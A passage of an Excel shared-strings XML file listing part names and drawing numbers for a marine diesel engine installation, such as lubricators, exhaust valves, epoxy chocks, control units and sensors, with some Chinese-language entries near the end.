    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, INSTRUMENTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, MANOEUVRING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOAD DIAGRAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF PARAMETERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLOW DOWN REQUIREMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING-TEXT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, TURNING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, PAINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE, LARGE SPARE PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCHARGER INFORMATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEOTECH. INVES., GEN. GUI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR INTAKE QUALITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SELECTION OF LUBES AND FU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN &amp; CAM LUB.OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIFICATION OF LUB. OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYSTEM, HEADER TA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE ROOM, PIST. ROD STUF. BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRAL COOL.WATER SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE ROOM, SCAVENG AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER CLEANING SYS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA LOG FOR EPOXY CASTIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA LOG FOR EPOXY SETTIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING TABLE, FOUNDATI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHOPTRAIL AND SETRAIL/SITETRAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFF.B.DRAIN CLEAN.INSTR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMISSIONING REPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON COOLING OIL, DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD AND CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCES (DLA 01) D</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LINER AND COOL. JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR CYLINDER LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE CAP FOR STAY B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER, BLANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INCONEL COATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, STARTING VALVE ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOUSING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLLOW BAR, FOR MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE FOR FLEX. STEEL TU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEX. STEEL TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE, MISC. PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE, FUEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING RING F. BORINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE HOUSING, FUEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE, EXHAUST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0100 EXHAUST VLE ACT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER GUIDE HOUSING, EXHAUST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON, VALVE GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAMSHAFT, BEARINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING VALVE (CYL.COVER)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE HOUSING-LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE HOUSING-UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MONT. ELECTRICAL EQUIPMEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION, WIRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON, U</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LUBRICATOR, WIRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>METAL CHANNELS, BUILT-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMP NUT W. SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CABLE CONDUITES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR CABLE TRAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE, INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPES,INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY DOCUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAL TYPE GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING WITH WHITE METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud coupling, straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GLUE FOR SILICONE RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT STUD COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULL RODS, COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER FOR GOVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUMATIC COMPONENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADHESIVE SIGN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCTION STATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF REDUCING VALVES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR SYSTEM RED.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0140 S.A.S., REDUCTI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL VALVES, WITH CERTIFI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCAL CONTROL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHANGE-OVER SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALCU, COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, BASEPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MASTER CONTROL UNIT (MCU)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SELF-CLINCHING FASTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRINTED CIRCUIT BOARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-ALUMINIUM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH BOARD UNIT (SBU)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BACKUP CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BACKUP CONTROL UNIT (BCU)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST SOFTWARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAP NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. PRESSURE MEASURING EQUIP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCOS, EDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING WEAR MONITORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WATER IN LUB.OIL MONITORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT POS. SENSING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF ANGLE ENCODER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF ENCODER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAMPING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD-LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING MATERIAL-PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE ENCODER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT, MEAS. TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>0570-0100 SAFETY EQUIPMEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FALL ARREST EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FALL ARREST BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESCUE HARNESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKCASE RELIE</t>
  </si>
  <si>
    <t>THRUST-  + GUIDE BEARING</t>
  </si>
  <si>
    <t>P90505-0175.0</t>
  </si>
  <si>
    <t>STOPPER SEGMENT - FORE</t>
  </si>
  <si>
    <t>1171792-4.3</t>
  </si>
  <si>
    <t>STOPPER SEGMENT - AFT</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING CPL.</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING, UPP</t>
  </si>
  <si>
    <t>5035680-7.2</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING LOW</t>
  </si>
  <si>
    <t>3171328-2.1</t>
  </si>
  <si>
    <t>SCRAPER RING UPPER</t>
  </si>
  <si>
    <t>3172596-9.1</t>
  </si>
  <si>
    <t>SCRAPER RING LOWER</t>
  </si>
  <si>
    <t>SQUARE STEEL BAR</t>
  </si>
  <si>
    <t>3472-0300 MAIN STARTING V</t>
  </si>
  <si>
    <t>ENGINE ROOM</t>
  </si>
  <si>
    <t>5672137-8.0</t>
  </si>
  <si>
    <t>ENGINE ROOM, SPACE REGUIR</t>
  </si>
  <si>
    <t>ENGINE SPACE REQUIREMENT</t>
  </si>
  <si>
    <t>5159052-7.4</t>
  </si>
  <si>
    <t>TURNING WHEEL COVER</t>
  </si>
  <si>
    <t>5628313-8.0</t>
  </si>
  <si>
    <t>ENG.SPEED, TELEGR.ORDER</t>
  </si>
  <si>
    <t>0786043-7.11</t>
  </si>
  <si>
    <t>ENGINE ROOM, LUB. AND COO</t>
  </si>
  <si>
    <t>1892538-7.1</t>
  </si>
  <si>
    <t>0783830-5.2</t>
  </si>
  <si>
    <t>LUB.OIL OUTLET,DETAIL</t>
  </si>
  <si>
    <t>ENGINE ROOM, CYL. LUBRICA</t>
  </si>
  <si>
    <t>STUFFING BOX DRAIN SYSTEM</t>
  </si>
  <si>
    <t>0796104-2.1</t>
  </si>
  <si>
    <t>ENGINE ROOM, COOLING JACK</t>
  </si>
  <si>
    <t>CENTRAL COOLING</t>
  </si>
  <si>
    <t>1793216-6.0</t>
  </si>
  <si>
    <t>CENTRAL COOLING SYSTEM</t>
  </si>
  <si>
    <t>0787022-7.3</t>
  </si>
  <si>
    <t>ENGINE ROOM, FUEL OIL SYS</t>
  </si>
  <si>
    <t>ENGINE ROOM, COMPRESSED A</t>
  </si>
  <si>
    <t>1899006-9.0</t>
  </si>
  <si>
    <t>5640572-6.0</t>
  </si>
  <si>
    <t>TC.MAX.FORCES AND MOMENTS</t>
  </si>
  <si>
    <t>EXHAUST GAS SYSTEM DATA</t>
  </si>
  <si>
    <t>0786371-9.3</t>
  </si>
  <si>
    <t>TRANSITION PIECE F. EXH.P</t>
  </si>
  <si>
    <t>0792713-1.1</t>
  </si>
  <si>
    <t>ENGINE ROOM, ENGINE ROOM</t>
  </si>
  <si>
    <t>1893023-9.1</t>
  </si>
  <si>
    <t>COMP. DISMANTLING HEIGHTS</t>
  </si>
  <si>
    <t>0781471-1.1</t>
  </si>
  <si>
    <t>CRANE BEAM FOR TC</t>
  </si>
  <si>
    <t>0794338-0.3</t>
  </si>
  <si>
    <t>FIRE EXTING.SCAV.A. SPACE</t>
  </si>
  <si>
    <t>1899004-5.0</t>
  </si>
  <si>
    <t>ENGINE ROOM, ENGINE SEATI</t>
  </si>
  <si>
    <t>H.D.+E-CHOCK BOLTS, EPOXY</t>
  </si>
  <si>
    <t>P91216-0009.0</t>
  </si>
  <si>
    <t>INFORMATION, EPOXY CHOCK</t>
  </si>
  <si>
    <t>ENGINE SEATING,EPOX.CHOCK</t>
  </si>
  <si>
    <t>0787280-2.8</t>
  </si>
  <si>
    <t>PLUG F.ALIGNM.SCREW HOLE</t>
  </si>
  <si>
    <t>0787938-3.3</t>
  </si>
  <si>
    <t>ALIGNMENT SCREW</t>
  </si>
  <si>
    <t>ARR. OF EPOXY CHOCKS</t>
  </si>
  <si>
    <t>CALCULATIONS, EPOXY CHOCK</t>
  </si>
  <si>
    <t>ASSEMBLY OF SIDE SHOCK</t>
  </si>
  <si>
    <t>0781948-2.5</t>
  </si>
  <si>
    <t>LINER F.SIDECHOCK,PORT</t>
  </si>
  <si>
    <t>0781967-3.6</t>
  </si>
  <si>
    <t>ASSEMBLY OF END CHOCK</t>
  </si>
  <si>
    <t>0792922-7.5</t>
  </si>
  <si>
    <t>ENGINE ROOM, TOP BRACING</t>
  </si>
  <si>
    <t>TOP BRACING DOUBLE BAR</t>
  </si>
  <si>
    <t>1893089-8.1</t>
  </si>
  <si>
    <t>PREPARATIONS F.MECH.TOPBR</t>
  </si>
  <si>
    <t>TOP BRACING ARRANGEMENT</t>
  </si>
  <si>
    <t>.1   1072-0500 Top Bracing</t>
  </si>
  <si>
    <t>1072-0500-0001</t>
  </si>
  <si>
    <t>DATA FOR TOP BRACING</t>
  </si>
  <si>
    <t>0788449-9.0</t>
  </si>
  <si>
    <t>FRICT.SHIM F.TOP BRACING</t>
  </si>
  <si>
    <t>0792360-6.4</t>
  </si>
  <si>
    <t>NUT, HEXAGON</t>
  </si>
  <si>
    <t>0792329-7.1</t>
  </si>
  <si>
    <t>1896146-6.1</t>
  </si>
  <si>
    <t>CRANKSH. MODEL FOR ALIGNM</t>
  </si>
  <si>
    <t>SHOPTRAIL AND SETRAIL/SIT</t>
  </si>
  <si>
    <t>MARINE PLANT INSTALLATION</t>
  </si>
  <si>
    <t>0742559-9.1</t>
  </si>
  <si>
    <t>PR LIQUID SEALING MATR.</t>
  </si>
  <si>
    <t>DISPATCH PATTERN</t>
  </si>
  <si>
    <t>0742420-8.3</t>
  </si>
  <si>
    <t>QUAY TRIAL AND SEA TRIAL</t>
  </si>
  <si>
    <t>QUAY TRIAL &amp; SEA TRIAL</t>
  </si>
  <si>
    <t>1234329-2.3</t>
  </si>
  <si>
    <t>QUAY TRIAL W.DISCON.PROP.</t>
  </si>
  <si>
    <t>1475251-6.1</t>
  </si>
  <si>
    <t>FLUSHING PROCEDURES MC</t>
  </si>
  <si>
    <t>1796375-1.1</t>
  </si>
  <si>
    <t>OUTLINE DIMENSION MAIN TO</t>
  </si>
  <si>
    <t>3167213-5.1</t>
  </si>
  <si>
    <t>TOOL PANELS-ENGINE ROOM</t>
  </si>
  <si>
    <t>1226673-5.3</t>
  </si>
  <si>
    <t>OUTLINE DIM.- MAIN TOOLS</t>
  </si>
  <si>
    <t>1226624-5.1</t>
  </si>
  <si>
    <t>ENGINE, OUTLINE</t>
  </si>
  <si>
    <t>5675008-9.0</t>
  </si>
  <si>
    <t>OUTLINE DRAWING</t>
  </si>
  <si>
    <t>5668507-4.0</t>
  </si>
  <si>
    <t>OUTLINE DRAWING PROCEDURE</t>
  </si>
  <si>
    <t>5673735-1.0</t>
  </si>
  <si>
    <t>FITTED BOLT,W.TOOL THREAD</t>
  </si>
  <si>
    <t>1072-1000-0010.0</t>
  </si>
  <si>
    <t>MOUNTING OF LOCKING WIRE</t>
  </si>
  <si>
    <t>SHAFTPIECE WITHOUT FLANGE</t>
  </si>
  <si>
    <t>5672165-3.0</t>
  </si>
  <si>
    <t>CRANK THROW</t>
  </si>
  <si>
    <t>SHAFT PIECE WITH FLANGE</t>
  </si>
  <si>
    <t>5668687-0.0</t>
  </si>
  <si>
    <t>FITTED STUD, THREAD B END</t>
  </si>
  <si>
    <t>5016516-5.0</t>
  </si>
  <si>
    <t>EXHAUST VALVE,LOWER PARTS</t>
  </si>
  <si>
    <t>P90801-0212.0</t>
  </si>
  <si>
    <t>EXHAUST VALVE,UPPER PARTS</t>
  </si>
  <si>
    <t>P90803-0070.0</t>
  </si>
  <si>
    <t>EXH.VALVE,UPPER P.DETAILS</t>
  </si>
  <si>
    <t>THREAD INSERT</t>
  </si>
  <si>
    <t>SPINDLE GUIDE-LOWER</t>
  </si>
  <si>
    <t>3163760-0.3</t>
  </si>
  <si>
    <t>FLANGE,OVAL FOR PIPES</t>
  </si>
  <si>
    <t>AIR CYLINDER, COMPLETE</t>
  </si>
  <si>
    <t>5037924-1.3</t>
  </si>
  <si>
    <t>PISTON, AIR CYLINDER</t>
  </si>
  <si>
    <t>1381115-5.5</t>
  </si>
  <si>
    <t>DISC, ROUND-PLAIN</t>
  </si>
  <si>
    <t>1380181-8.4</t>
  </si>
  <si>
    <t>PISTON, ACTUATOR</t>
  </si>
  <si>
    <t>1816558-9.1</t>
  </si>
  <si>
    <t>ORIFICE PLUG, OUTS.THREAD</t>
  </si>
  <si>
    <t>REDUCING ADAPTER MALE/MAL</t>
  </si>
  <si>
    <t>STEEL PIPE-STRAIGHT</t>
  </si>
  <si>
    <t>Dowel pin, w. external th</t>
  </si>
  <si>
    <t>SAFETY HANDRAIL</t>
  </si>
  <si>
    <t>0974620-4.2</t>
  </si>
  <si>
    <t>PLUG SCREWS, BLANKING END</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATOR, MBD ALPHA CYLINDER</t>
  </si>
  <si>
    <t>5675276-0.0</t>
  </si>
  <si>
    <t>LUBRICATOR COMPLETE</t>
  </si>
  <si>
    <t>5673086-7.0</t>
  </si>
  <si>
    <t>HYDR. BLOCK + LUBRICATOR</t>
  </si>
  <si>
    <t>5292727-0.1</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATOR UNIT</t>
  </si>
  <si>
    <t>HYDRAULIC BLOCK</t>
  </si>
  <si>
    <t>ALPHA LUBRICATION</t>
  </si>
  <si>
    <t>CYLINDER HOUSING</t>
  </si>
  <si>
    <t>ACTUATOR PISTON</t>
  </si>
  <si>
    <t>4/2-WAY SOLENOID VALVE</t>
  </si>
  <si>
    <t>INDUCTIVE SENSOR</t>
  </si>
  <si>
    <t>SPACER, TUBULAR</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5294070-0.0</t>
  </si>
  <si>
    <t>MEMBRANE ACCUMULATOR</t>
  </si>
  <si>
    <t>GASKET, ROUND-SPECIAL</t>
  </si>
  <si>
    <t>HYDRAULICS BLOCK</t>
  </si>
  <si>
    <t>BALL VALVE-FLANGE CONN.</t>
  </si>
  <si>
    <t>BRACKET-LUBRICATOR</t>
  </si>
  <si>
    <t>5674611-0.0</t>
  </si>
  <si>
    <t>EL.ENCLOSURE F.-CYL.LUB.</t>
  </si>
  <si>
    <t>SUPPORT-CYL.LUB.OIL PIPE</t>
  </si>
  <si>
    <t>ARRANGEMENT OF PICKUPS</t>
  </si>
  <si>
    <t>ARR. OF TACHO PICK-UPS</t>
  </si>
  <si>
    <t>5189497-4.2</t>
  </si>
  <si>
    <t>SUPPORT, PICK-UP BOX</t>
  </si>
  <si>
    <t>5190001-7.1</t>
  </si>
  <si>
    <t>PLATE, SHAPED</t>
  </si>
  <si>
    <t>TDC INDICATOR</t>
  </si>
  <si>
    <t>5055777-6.0</t>
  </si>
  <si>
    <t>FACE</t>
  </si>
  <si>
    <t>BRACKET, PICK-UP BOX</t>
  </si>
  <si>
    <t>5036936-7.1</t>
  </si>
  <si>
    <t>PICK-UP BOX</t>
  </si>
  <si>
    <t>1142747-5.5</t>
  </si>
  <si>
    <t>SENSOR COMPLETE</t>
  </si>
  <si>
    <t>5337104-3.0</t>
  </si>
  <si>
    <t>NAME PLATES ENGINE CONTROL SYSTEM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>P91011-0043.0</t>
  </si>
  <si>
    <t>5472-0400 S.A. Cooler Non</t>
  </si>
  <si>
    <t>MAIN BEARING COMPLETE</t>
  </si>
  <si>
    <t>5213693-8.6</t>
  </si>
  <si>
    <t>SUPPLEMENTARY LIST</t>
  </si>
  <si>
    <t>MAIN BEARING BLENDED EDGE</t>
  </si>
  <si>
    <t>ISOLATION VALVE</t>
  </si>
  <si>
    <t>1747165-0.4</t>
  </si>
  <si>
    <t>REDUCING NIPPLE</t>
  </si>
  <si>
    <t>3164917-7.1</t>
  </si>
  <si>
    <t>THERMONITOR</t>
  </si>
  <si>
    <t>5121471-2.2</t>
  </si>
  <si>
    <t>THERMOMETER, DIAL TYPE/ S</t>
  </si>
  <si>
    <t>5255303-8.0</t>
  </si>
  <si>
    <t>PLATE FOR INSTRUMENTS</t>
  </si>
  <si>
    <t>3164614-5.1</t>
  </si>
  <si>
    <t>THERMOMETER,DIAL TYPE</t>
  </si>
  <si>
    <t>1813212-2.2</t>
  </si>
  <si>
    <t>SIKA TEMPERATURE SENSOR</t>
  </si>
  <si>
    <t>ROUND IRON, D&lt;L   0- 50</t>
  </si>
  <si>
    <t>5129123-4.1</t>
  </si>
  <si>
    <t>VIBR. DAMPING SUPPORT, RU</t>
  </si>
  <si>
    <t>5129728-6.0</t>
  </si>
  <si>
    <t>SENSOR POCKET</t>
  </si>
  <si>
    <t>5146227-0.0</t>
  </si>
  <si>
    <t>SUPPORT, BASE W HOLES</t>
  </si>
  <si>
    <t>DIFFERENTIAL PRESSURE TRA</t>
  </si>
  <si>
    <t>5506801-6.4</t>
  </si>
  <si>
    <t>DIFF.PRESSURE TRANSMITTER</t>
  </si>
  <si>
    <t>5650539-7.0</t>
  </si>
  <si>
    <t>ADAPTER, STRAIGHT, MALE/F</t>
  </si>
  <si>
    <t>5632096-4.1</t>
  </si>
  <si>
    <t>ARR. OF PRESSURE SWITCH</t>
  </si>
  <si>
    <t>5676282-4.0</t>
  </si>
  <si>
    <t>LIST OF FLANGES</t>
  </si>
  <si>
    <t>5670306-9.0</t>
  </si>
  <si>
    <t>5328037-3.10</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">检验信息号                                             </t>
  </si>
  <si>
    <t xml:space="preserve">K90GF机型剖面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">K80GF机型剖面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">L55GF机型剖面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">K45GF机型剖面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">L67GF机型剖面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">K84+84VT2机型剖面图                                    </t>
  </si>
  <si>
    <t xml:space="preserve">纵剖面                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主要尺寸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部部件号                                             </t>
  </si>
  <si>
    <t xml:space="preserve">CHR.HAVN测试机                                       </t>
  </si>
  <si>
    <t xml:space="preserve">TEGLHOLMEN测试机                                     </t>
  </si>
  <si>
    <t xml:space="preserve">TEGLHOLMEN试验中心                                    </t>
  </si>
  <si>
    <t xml:space="preserve">图解-双燃料                                            </t>
  </si>
  <si>
    <t xml:space="preserve">横截面                                               </t>
  </si>
  <si>
    <t xml:space="preserve">维修报告                                              </t>
  </si>
  <si>
    <t xml:space="preserve">超声波检查质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">分成主要部分                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发电机安装面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子接近仪安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封垫片-机座/机架                                        </t>
  </si>
  <si>
    <t xml:space="preserve">出口                                                </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">测量表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴瓦拆装工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座内油位                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机架总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">后部端部机架总成                                          </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓变形诊断                                          </t>
  </si>
  <si>
